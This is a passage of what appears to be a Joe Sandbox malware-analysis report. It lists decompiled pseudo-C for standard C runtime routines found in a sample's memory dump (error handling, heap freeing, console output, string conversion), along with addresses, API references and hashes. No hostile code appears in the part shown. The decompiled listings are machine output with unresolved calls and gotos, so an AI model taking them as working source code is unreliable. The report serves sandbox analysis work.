												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x95984c; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x91d130();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0090BE59(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x92a430);
									E009059D0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E009085A1(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E009092A7(_t103, _t108[0x18], E00906B3C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E009092B7(_t103, _t108[0x18], E00906B3C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00906B3C();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x009085a1
0x009085a3
0x009085a8
0x009085ad
0x009085af
0x009085b2
0x009085b7
0x009086c7
0x009086c7
0x009086c7
0x00000000
0x009085c6
0x009085c6
0x009085cb
0x009085d5
0x009085d7
0x009085dc
0x009085e1
0x009085e1
0x009085e3
0x009085e6
0x009085eb
0x0090860d
0x0090860d
0x00908610
0x00908613
0x00908631
0x00908634
0x00908673
0x00908676
0x00908679
0x0090869e
0x009086a0
0x00000000
0x009086a2
0x009086a2
0x009086a4
0x00000000
0x009086a6
0x009086a6
0x009086ab
0x009086af
0x009086af
0x009086b0
0x00000000
0x009086b0
0x009086a4
0x0090867b
0x0090867b
0x0090867d
0x00000000
0x0090867f
0x0090867f
0x00908681
0x00000000
0x00908683
0x00908694
0x00000000
0x00908699
0x00908681
0x0090867d
0x00908636
0x00908636
0x0090863a
0x00000000
0x00908640
0x00908640
0x00908642
0x00000000
0x00908648
0x0090864f
0x00908657
0x0090865b
0x0090865d
0x00908660
0x00908665
0x00908666
0x00000000
0x00908666
0x00908660
0x00000000
0x0090865b
0x00908642
0x0090863a
0x00908615
0x00908615
0x00000000
0x00908615
0x009085f2
0x009085f2
0x009085f7
0x009085fc
0x00000000
0x009085fe
0x00908600
0x00908609
0x00908618
0x0090861a
0x009086d9
0x009086d9
0x009086de
0x009086df
0x009086e1
0x009086e6
0x009086eb
0x009086ee
0x009086f1
0x009086f4
0x009086fd
0x009086fd
0x009086f6
0x009086f6
0x009086f6
0x00908700
0x00908704
0x00908707
0x00908708
0x00908709
0x0090870a
0x0090870d
0x00908716
0x00908716
0x00908719
0x0090874f
0x0090871b
0x0090871b
0x0090871b
0x0090871e
0x00908735
0x00908735
0x0090871e
0x00908754
0x0090875e
0x0090876a
0x00908628
0x00908628
0x0090862d
0x0090862e
0x00908668
0x0090866f
0x009086b3
0x009086b3
0x009086ba
0x009086c9
0x009086cc
0x009086d8
0x009086d8
0x0090861a
0x009085fc
0x00000000
0x00000000
0x00000000
0x009085cb

APIs

___AdjustPointer.LIBCMT ref: 00908668
___AdjustPointer.LIBCMT ref: 0090868B
___AdjustPointer.LIBCMT ref: 00908727

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0d7d979693fb6a8306c09e4b502811f2ad0113e4abee3fe3f240c5dc8a37fa81
Instruction ID: 20ea1cf962bf304d797cfd1d7982a9bef79bcd1c5c4870daa3fa5d3673d2db99
Opcode Fuzzy Hash: 0d7d979693fb6a8306c09e4b502811f2ad0113e4abee3fe3f240c5dc8a37fa81
Instruction Fuzzy Hash: CE51C472B04606AFDB298F54D941B7B77A8FF84710F25452DE882972D1EB32EC90DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00915D16 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00915D16(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E009158D1(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E009158D1(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00909B26(GetLastError());
									_t19 =  *((intOrPtr*)(E00909B5C(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E009162DC(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00909B26(GetLastError());
						return  *((intOrPtr*)(E00909B5C(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E009162DC(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E0090C138(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00915d1d
0x00915d22
0x00915d40
0x00915d42
0x00915d45
0x00915d72
0x00915d7a
0x00915d7c
0x00915d95
0x00915d98
0x00915d9b
0x00915da9
0x00915db8
0x00915dc0
0x00915dc2
0x00915ddb
0x00915dde
0x00915dde
0x00915dc4
0x00915dcb
0x00915dd6
0x00915dd6
0x00915de0
0x00000000
0x00915de0
0x00915da0
0x00915da5
0x00915da7
0x00000000
0x00000000
0x00000000
0x00915da7
0x00915d85
0x00000000
0x00915d90
0x00915d47
0x00915d4a
0x00915d4d
0x00915d60
0x00915d63
0x00915d36
0x00915d36
0x00000000
0x00915d39
0x00915d53
0x00915d58
0x00915d5a
0x00915de4
0x00915de4
0x00000000
0x00915d5a
0x00915d24
0x00915d29
0x00915d2e
0x00915d30
0x00915d33
0x00000000

APIs

Part of subcall function 0090C138: _free.LIBCMT ref: 0090C146

Part of subcall function 009158D1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00913672,?,00000000,00000000), ref: 0091597D

GetLastError.KERNEL32 ref: 00915D7E
__dosmaperr.LIBCMT ref: 00915D85
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00915DC4
__dosmaperr.LIBCMT ref: 00915DCB

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: c2cc672ffd385d8ad26548337fd38016a48ecb6f3c1bcd26b33e542d6b6d06d6
Instruction ID: 5dcaec802328f7391f85011f268bb8514ba29f8418b800df4ba55c2d938c38f8
Opcode Fuzzy Hash: c2cc672ffd385d8ad26548337fd38016a48ecb6f3c1bcd26b33e542d6b6d06d6
Instruction Fuzzy Hash: 5721A175700A1DEFDB20AF61AC85AABB7ACEF843647538515F829971C1D730EC8097A0

Uniqueness

Uniqueness Score: -1.00%

Function 0090FBFC Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E0090FBFC(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x92c190; // 0x2
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0091033B(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00910679(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E0091033B(__eflags,  *0x92c190, _t51);
							if(__eflags != 0) {
								E0090FA2A(_t51, 0x959ec4);
								E0090F884(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E0091033B(__eflags,  *0x92c190, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E0091033B(0,  *0x92c190, 0);
							_push(0);
							L9:
							E0090F884();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E009102FC(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x92c190; // 0x2
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E0090BE59(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x92c190; // 0x2
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E0091033B(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00910679(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E0091033B(__eflags,  *0x92c190, _t60);
								if(__eflags != 0) {
									E0090FA2A(_t60, 0x959ec4);
									E0090F884(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E0091033B(__eflags,  *0x92c190, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E0091033B(__eflags,  *0x92c190, _t20);
								_push(_t60);
								L25:
								E0090F884();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E009102FC(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x92c190; // 0x2
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E0090BE59(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x92c190; // 0x2
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E0091033B(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00910679(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E0091033B(__eflags,  *0x92c190, _t54);
											if(__eflags != 0) {
												E0090FA2A(_t54, 0x959ec4);
												E0090F884(0);
												goto L45;
											} else {
												_t40 = 0;
												E0091033B(__eflags,  *0x92c190, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E0091033B(0,  *0x92c190, 0);
											_push(0);
											L41:
											E0090F884();
											goto L36;
										}
									}
								} else {
									_t54 = E009102FC(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x92c190; // 0x2
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x0090fbfc
0x0090fbfc
0x0090fc07
0x0090fc09
0x0090fc0e
0x0090fc11
0x0090fc2f
0x0090fc32
0x0090fc37
0x0090fc39
0x00000000
0x0090fc3b
0x0090fc47
0x0090fc4a
0x0090fc4b
0x0090fc4d
0x0090fc72
0x0090fc74
0x0090fc8d
0x0090fc94
0x0090fc99
0x00000000
0x0090fc76
0x0090fc76
0x0090fc7f
0x0090fc84
0x00000000
0x0090fc84
0x0090fc4f
0x0090fc4f
0x0090fc4f
0x0090fc58
0x0090fc5d
0x0090fc5e
0x0090fc5e
0x0090fc63
0x00000000
0x0090fc63
0x0090fc4d
0x0090fc13
0x0090fc19
0x0090fc1d
0x0090fc2a
0x00000000
0x0090fc1f
0x0090fc22
0x0090fc9c
0x0090fc9c
0x0090fc24
0x0090fc24
0x0090fc24
0x0090fc26
0x0090fc26
0x0090fc26
0x0090fc22
0x0090fc1d
0x0090fc9f
0x0090fca7
0x0090fca9
0x0090fcab
0x0090fcb3
0x0090fcb8
0x0090fcb9
0x0090fcbe
0x0090fcbf
0x0090fcc2
0x0090fcdc
0x0090fcdf
0x0090fce4
0x0090fce6
0x00000000
0x0090fce8
0x0090fcf4
0x0090fcf7
0x0090fcf8
0x0090fcfa
0x0090fd1d
0x0090fd1f
0x0090fd36
0x0090fd3d
0x0090fd42
0x00000000
0x0090fd21
0x0090fd28
0x0090fd2d
0x00000000
0x0090fd2d
0x0090fcfc
0x0090fd03
0x0090fd08
0x0090fd09
0x0090fd09
0x0090fd0e
0x00000000
0x0090fd0e
0x0090fcfa
0x0090fcc4
0x0090fcca
0x0090fccc
0x0090fcce
0x0090fcd7
0x00000000
0x0090fcd0
0x0090fcd0
0x0090fcd3
0x0090fd4d
0x0090fd4d
0x0090fd52
0x0090fd55
0x0090fd56
0x0090fd57
0x0090fd5e
0x0090fd60
0x0090fd65
0x0090fd68
0x0090fd86
0x0090fd89
0x0090fd8e
0x0090fd90
0x00000000
0x0090fd92
0x0090fd9e
0x0090fda2
0x0090fda4
0x0090fdc9
0x0090fdcb
0x0090fde4
0x0090fdeb
0x00000000
0x0090fdcd
0x0090fdcd
0x0090fdd6
0x0090fddb
0x00000000
0x0090fddb
0x0090fda6
0x0090fda6
0x0090fda6
0x0090fdaf
0x0090fdb4
0x0090fdb5
0x0090fdb5
0x00000000
0x0090fdba
0x0090fda4
0x0090fd6a
0x0090fd70
0x0090fd72
0x0090fd74
0x0090fd81
0x00000000
0x0090fd76
0x0090fd76
0x0090fd79
0x0090fdf3
0x0090fdf3
0x0090fd7b
0x0090fd7b
0x0090fd7b
0x0090fd7b
0x0090fd7d
0x0090fd7d
0x0090fd7d
0x0090fd79
0x0090fd74
0x0090fdf6
0x0090fdfe
0x0090fe00
0x0090fe00
0x0090fe07
0x0090fcd5
0x0090fd45
0x0090fd45
0x0090fd47
0x00000000
0x0090fd49
0x0090fd4c
0x0090fd4c
0x0090fd47
0x0090fcd3
0x0090fcce
0x0090fcad
0x0090fcb2
0x0090fcb2

APIs

GetLastError.KERNEL32(?,00000000,?,0090BB24,00000000,00000000,?,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC01
_free.LIBCMT ref: 0090FC5E
_free.LIBCMT ref: 0090FC94
SetLastError.KERNEL32(00000000,00000002,000000FF,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC9F

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 68c4a6f30e87046070f12f78739a021d9f2219fd6be72c16532765b62033a437
Instruction ID: d1fcbc476e3dc8a5187e218cbcc400d88475ecdf854f51317b4c18f8be5cad93
Opcode Fuzzy Hash: 68c4a6f30e87046070f12f78739a021d9f2219fd6be72c16532765b62033a437
Instruction Fuzzy Hash: 0611297231C11A6FEB3063745C97BAA219EDBC9774B240634FB64875D3EE618D429160

Uniqueness

Uniqueness Score: -1.00%

Function 0090FD53 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0090FD53(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x92c190; // 0x2
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0091033B(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00910679(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E0091033B(__eflags,  *0x92c190, _t18);
							if(__eflags != 0) {
								E0090FA2A(_t18, 0x959ec4);
								E0090F884(0);
								goto L13;
							} else {
								_t13 = 0;
								E0091033B(__eflags,  *0x92c190, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E0091033B(0,  *0x92c190, 0);
							_push(0);
							L9:
							E0090F884();
							goto L4;
						}
					}
				} else {
					_t18 = E009102FC(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x92c190; // 0x2
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x0090fd5e
0x0090fd60
0x0090fd65
0x0090fd68
0x0090fd86
0x0090fd89
0x0090fd8e
0x0090fd90
0x00000000
0x0090fd92
0x0090fd9e
0x0090fda2
0x0090fda4
0x0090fdc9
0x0090fdcb
0x0090fde4
0x0090fdeb
0x00000000
0x0090fdcd
0x0090fdcd
0x0090fdd6
0x0090fddb
0x00000000
0x0090fddb
0x0090fda6
0x0090fda6
0x0090fda6
0x0090fdaf
0x0090fdb4
0x0090fdb5
0x0090fdb5
0x00000000
0x0090fdba
0x0090fda4
0x0090fd6a
0x0090fd70
0x0090fd74
0x0090fd81
0x00000000
0x0090fd76
0x0090fd79
0x0090fdf3
0x0090fdf3
0x0090fd7b
0x0090fd7b
0x0090fd7b
0x0090fd7d
0x0090fd7d
0x0090fd7d
0x0090fd79
0x0090fd74
0x0090fdf6
0x0090fdfe
0x0090fe07

APIs

GetLastError.KERNEL32(?,?,?,00909B61,0091066E,?,?,00905E75,?,?,?,?,?,00901137,?,?), ref: 0090FD58
_free.LIBCMT ref: 0090FDB5
_free.LIBCMT ref: 0090FDEB
SetLastError.KERNEL32(00000000,00000002,000000FF,?,?,00905E75,?,?,?,?,?,00901137,?,?), ref: 0090FDF6

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3766d45999bc24b68f8f7eea14ce49dac3c4b2bc7488c04d8dc1f07d9189228c
Instruction ID: 1e4615da1000b23597183c11f8d4a2dc257ffcfee683052c4d474f15ad54d271
Opcode Fuzzy Hash: 3766d45999bc24b68f8f7eea14ce49dac3c4b2bc7488c04d8dc1f07d9189228c
Instruction Fuzzy Hash: 0611487331C2056FD73066786CD2FAA215EEBC93B5B340234F6248B5E2EF618D979120

Uniqueness

Uniqueness Score: -1.00%

Function 0091BC98 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0091BC98(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x92ca50, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0091BC81();
					E0091BC43();
					_t13 = WriteConsoleW( *0x92ca50, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0091bcb5
0x0091bcb9
0x0091bcc6
0x0091bccb
0x0091bce6
0x0091bce6
0x0091bcec

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0091ACEC,00000000,00000001,00000000,00000000,?,009121A4,?,00000000,00000000), ref: 0091BCAF
GetLastError.KERNEL32(?,0091ACEC,00000000,00000001,00000000,00000000,?,009121A4,?,00000000,00000000,?,00000000,?,009126F0,?), ref: 0091BCBB

Part of subcall function 0091BC81: CloseHandle.KERNEL32(FFFFFFFE,0091BCCB,?,0091ACEC,00000000,00000001,00000000,00000000,?,009121A4,?,00000000,00000000,?,00000000), ref: 0091BC91

___initconout.LIBCMT ref: 0091BCCB

Part of subcall function 0091BC43: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0091BC72,0091ACD9,00000000,?,009121A4,?,00000000,00000000,?), ref: 0091BC56

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0091ACEC,00000000,00000001,00000000,00000000,?,009121A4,?,00000000,00000000,?), ref: 0091BCE0

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c6393fb4bfc543359772a12758b5aef600104e1709c989a6b66877781cab3aaa
Instruction ID: 57cac54d69e1d75bbba841f53d08e99f0aeafd763dce1c623baa26ad48826822
Opcode Fuzzy Hash: c6393fb4bfc543359772a12758b5aef600104e1709c989a6b66877781cab3aaa
Instruction Fuzzy Hash: 9AF0AC36615118BBCF225F99DC05ADA3F66FB893B1B148010FA5995120DB329960EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0090E939 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0090E939() {

				E0090F884( *0x959ebc);
				 *0x959ebc = 0;
				E0090F884( *0x959ec0);
				 *0x959ec0 = 0;
				E0090F884( *0x959b94);
				 *0x959b94 = 0;
				E0090F884( *0x959b98);
				 *0x959b98 = 0;
				return 1;
			}

0x0090e942
0x0090e94f
0x0090e955
0x0090e960
0x0090e966
0x0090e971
0x0090e977
0x0090e97f
0x0090e988

APIs

_free.LIBCMT ref: 0090E942

Part of subcall function 0090F884: HeapFree.KERNEL32(00000000,00000000,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?), ref: 0090F89A
Part of subcall function 0090F884: GetLastError.KERNEL32(?,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?,?), ref: 0090F8AC

_free.LIBCMT ref: 0090E955
_free.LIBCMT ref: 0090E966
_free.LIBCMT ref: 0090E977

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f74e31709f1cd00f0b06c8e36107729a6901a3dbee03cdc483747e67acde14f0
Instruction ID: cbb6c25f6248eec58f004da89d2ae610d38781ac1153cb22efde48dd513a0866
Opcode Fuzzy Hash: f74e31709f1cd00f0b06c8e36107729a6901a3dbee03cdc483747e67acde14f0
Instruction Fuzzy Hash: FEE0B67383C321DEFB26EF1ABC126993B62F78871A301412AF80912671D7760656FF81

Uniqueness

Uniqueness Score: -1.00%

Function 0090BC6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0090BCFD

Strings

pow, xrefs: 0090BCD5, 0090BCF2

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
